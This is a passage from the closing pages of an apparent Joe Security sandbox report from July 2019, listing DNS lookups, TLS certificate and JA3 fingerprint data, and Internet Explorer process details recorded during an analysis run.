A (IP address) IN (0x0001)

Jul 9, 2019 03:22:40.320421934 CEST 192.168.2.5 8.8.8.8 0x6892 Standard query (0)

statics-uhf-wus.akamaized.net

A (IP address) IN (0x0001)

Jul 9, 2019 03:22:40.335621119 CEST 192.168.2.5 8.8.8.8 0x4067 Standard query (0)

ajax.aspnetcdn.com

A (IP address) IN (0x0001)

Jul 9, 2019 03:22:40.351214886 CEST 192.168.2.5 8.8.8.8 0x2817 Standard query (0)

img-prod-cms-rt-microsoft-com.akamaized.net

A (IP address) IN (0x0001)

Jul 9, 2019 03:22:44.350034952 CEST 192.168.2.5 8.8.8.8 0x7a7f Standard query (0)

assets.onestore.ms

A (IP address) IN (0x0001)

Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class

Jul 9, 2019 03:22:18.072875023 CEST

8.8.8.8 192.168.2.5 0x647f No error (0) secure.aadcdn.microsoftonline-p.com

secure.aadcdn.microsoftonline-p.com.edgekey.net

CNAME (Canonical name)

IN (0x0001)

Jul 9, 2019 03:22:18.120796919 CEST

8.8.8.8 192.168.2.5 0xc682 No error (0) code.jquery.com cds.s5x3j6q5.hwcdn.net CNAME (Canonical name)

IN (0x0001)

Jul 9, 2019 03:22:33.498903036 CEST

8.8.8.8 192.168.2.5 0xf793 No error (0) secure.aadcdn.microsoftonline-p.com

secure.aadcdn.microsoftonline-p.com.edgekey.net

CNAME (Canonical name)

IN (0x0001)

Jul 9, 2019 03:22:34.648251057 CEST

8.8.8.8 192.168.2.5 0x96be No error (0) login.microsoftonline.com

prda.aadg.msidentity.com CNAME (Canonical name)

IN (0x0001)

Jul 9, 2019 03:22:34.648251057 CEST

8.8.8.8 192.168.2.5 0x96be No error (0) prda.aadg.msidentity.com

www.prdtm.aadg.akadns.net

CNAME (Canonical name)

IN (0x0001)

Jul 9, 2019 03:22:34.837987900 CEST

8.8.8.8 192.168.2.5 0x4f22 No error (0) aadcdn.msauth.net

aadcdnoriginwus2.azureedge.net

CNAME (Canonical name)

IN (0x0001)

Jul 9, 2019 03:22:36.197906971 CEST

8.8.8.8 192.168.2.5 0xed42 No error (0) login.msa.msidentity.com

lgin.msa.trafficmanager.net

CNAME (Canonical name)

IN (0x0001)

Jul 9, 2019 03:22:36.628884077 CEST

8.8.8.8 192.168.2.5 0x19d5 No error (0) signup.live.com account.msa.msidentity.com

CNAME (Canonical name)

IN (0x0001)

Jul 9, 2019 03:22:36.628884077 CEST

8.8.8.8 192.168.2.5 0x19d5 No error (0) account.msa.msidentity.com

account.msa.akadns6.net CNAME (Canonical name)

IN (0x0001)

Jul 9, 2019 03:22:36.628884077 CEST

8.8.8.8 192.168.2.5 0x19d5 No error (0) prda.aadg.msidentity.com

www.prdtm.aadg.windows.net.nsatc.net

CNAME (Canonical name)

IN (0x0001)

Jul 9, 2019 03:22:37.475236893 CEST

8.8.8.8 192.168.2.5 0x9b8 No error (0) acctcdn.msauth.net

acctcdn.trafficmanager.net

CNAME (Canonical name)

IN (0x0001)

Jul 9, 2019 03:22:37.475236893 CEST

8.8.8.8 192.168.2.5 0x9b8 No error (0) cs1227.wpc.alphacdn.net

192.229.221.185 A (IP address) IN (0x0001)

Jul 9, 2019 03:22:39.078263044 CEST

8.8.8.8 192.168.2.5 0x64b1 No error (0) aa-hip-prod.southcentralus.cloudapp.azure.com

104.215.74.84 A (IP address) IN (0x0001)

Jul 9, 2019 03:22:40.362567902 CEST

8.8.8.8 192.168.2.5 0x6892 No error (0) statics-uhf-wus.akamaized.net

a849.dscg2.akamai.net CNAME (Canonical name)

IN (0x0001)

DNS Queries

DNS Answers

Copyright Joe Security LLC 2019 Page 43 of 47

Jul 9, 2019 03:22:40.366381884 CEST

8.8.8.8 192.168.2.5 0x4067 No error (0) ajax.aspnetcdn.com

mscomajax.vo.msecnd.net

CNAME (Canonical name)

IN (0x0001)

Jul 9, 2019 03:22:40.390448093 CEST

8.8.8.8 192.168.2.5 0x2817 No error (0) img-prod-cms-rt-microsoft-com.akamaized.net

a1449.dscg2.akamai.net CNAME (Canonical name)

IN (0x0001)

Jul 9, 2019 03:22:44.407598972 CEST

8.8.8.8 192.168.2.5 0x7a7f No error (0) assets.onestore.ms

assets.onestore.ms.akadns.net

CNAME (Canonical name)

IN (0x0001)

Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class

Timestamp Source IPSourcePort Dest IP

DestPort Subject Issuer

NotBefore

NotAfter

JA3 SSL ClientFingerprint JA3 SSL Client Digest

Jul 9, 2019 03:22:37.642251968 CEST

192.229.221.185 443 192.168.2.5 49725 CN=prod-identitycdnsan.msauth.net CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US

CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE

Mon Dec 17 23:12:34 CET 2018 Fri May 20 14:53:03 CEST 2016

Thu Dec 17 23:12:34 CET 2020 Mon May 20 14:53:03 CEST 2024

771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0

9e10692f1b7f78228b2d4e424db3a98c

CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US

CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE

Fri May 20 14:53:03 CEST 2016

Mon May 20 14:53:03 CEST 2024

Jul 9, 2019 03:22:37.643217087 CEST

192.229.221.185 443 192.168.2.5 49727 CN=prod-identitycdnsan.msauth.net CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US

CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE

Mon Dec 17 23:12:34 CET 2018 Fri May 20 14:53:03 CEST 2016

Thu Dec 17 23:12:34 CET 2020 Mon May 20 14:53:03 CEST 2024

771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0

9e10692f1b7f78228b2d4e424db3a98c

CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US

CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE

Fri May 20 14:53:03 CEST 2016

Mon May 20 14:53:03 CEST 2024

Jul 9, 2019 03:22:37.643553019 CEST

192.229.221.185 443 192.168.2.5 49729 CN=prod-identitycdnsan.msauth.net CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US

CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE

Mon Dec 17 23:12:34 CET 2018 Fri May 20 14:53:03 CEST 2016

Thu Dec 17 23:12:34 CET 2020 Mon May 20 14:53:03 CEST 2024

771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0

9e10692f1b7f78228b2d4e424db3a98c

CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US

CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE

Fri May 20 14:53:03 CEST 2016

Mon May 20 14:53:03 CEST 2024

Jul 9, 2019 03:22:37.643855095 CEST

192.229.221.185 443 192.168.2.5 49728 CN=prod-identitycdnsan.msauth.net CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US

CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE

Mon Dec 17 23:12:34 CET 2018 Fri May 20 14:53:03 CEST 2016

Thu Dec 17 23:12:34 CET 2020 Mon May 20 14:53:03 CEST 2024

771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0

9e10692f1b7f78228b2d4e424db3a98c

CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US

CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE

Fri May 20 14:53:03 CEST 2016

Mon May 20 14:53:03 CEST 2024

HTTPS Packets

Copyright Joe Security LLC 2019 Page 44 of 47

Code Manipulations

Statistics

Behavior

• iexplore.exe

• iexplore.exe

Click to jump to process

System Behavior

Jul 9, 2019 03:22:37.646456957 CEST

192.229.221.185 443 192.168.2.5 49730 CN=prod-identitycdnsan.msauth.net CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US

CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE

Mon Dec 17 23:12:34 CET 2018 Fri May 20 14:53:03 CEST 2016

Thu Dec 17 23:12:34 CET 2020 Mon May 20 14:53:03 CEST 2024

771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0

9e10692f1b7f78228b2d4e424db3a98c

CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US

CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE

Fri May 20 14:53:03 CEST 2016

Mon May 20 14:53:03 CEST 2024

Jul 9, 2019 03:22:37.646611929 CEST

192.229.221.185 443 192.168.2.5 49726 CN=prod-identitycdnsan.msauth.net CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US

CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE

Mon Dec 17 23:12:34 CET 2018 Fri May 20 14:53:03 CEST 2016

Thu Dec 17 23:12:34 CET 2020 Mon May 20 14:53:03 CEST 2024

771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0

9e10692f1b7f78228b2d4e424db3a98c

CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US

CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE

Fri May 20 14:53:03 CEST 2016

Mon May 20 14:53:03 CEST 2024

Timestamp Source IPSourcePort Dest IP

DestPort Subject Issuer

NotBefore

NotAfter

JA3 SSL ClientFingerprint JA3 SSL Client Digest

Analysis Process: iexplore.exe PID: 4576 Parent PID: 692Analysis Process: iexplore.exe PID: 4576 Parent PID: 692

General

Copyright Joe Security LLC 2019 Page 45 of 47

File ActivitiesFile Activities

Registry ActivitiesRegistry Activities

Start time: 03:22:14

Start date: 09/07/2019

Path: C:\Program Files\internet explorer\iexplore.exe

Wow64 process (32bit): false

Commandline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding

Imagebase: 0x7ff7033a0000

File size: 823560 bytes

MD5 hash: 6465CB92B25A7BC1DF8E01D8AC5E7596

Has administrator privileges: true

Programmed in: C, C++ or other language

Reputation: high

File Path Access Attributes Options Completion CountSourceAddress Symbol

File Path Offset Length Value Ascii Completion CountSourceAddress Symbol

File Path Offset Length Completion CountSourceAddress Symbol

Key Path Completion CountSourceAddress Symbol

Key Path Name Type Data Completion CountSourceAddress Symbol

Key Path Name Type Old Data New Data Completion CountSourceAddress Symbol

File ActivitiesFile Activities

Registry ActivitiesRegistry Activities

Start time: 03:22:15

Start date: 09/07/2019

Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe

Wow64 process (32bit): true

Commandline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4576 CREDAT:17410 /prefetch:2

Imagebase: 0x1080000

File size: 822536 bytes

MD5 hash: 071277CC2E3DF41EEEA8013E2AB58D5A

Has administrator privileges: true

Programmed in: C, C++ or other language

Reputation: high

File Path Access Attributes Options Completion CountSourceAddress Symbol

File Path Offset Length Value Ascii Completion CountSourceAddress Symbol

File Path Offset Length Completion CountSourceAddress Symbol

Key Path Name Type Old Data New Data Completion CountSourceAddress Symbol

Analysis Process: iexplore.exe PID: 4256 Parent PID: 4576Analysis Process: iexplore.exe PID: 4256 Parent PID: 4576

General

Copyright Joe Security LLC 2019 Page 46 of 47

Disassembly

Copyright Joe Security LLC 2019 Page 47 of 47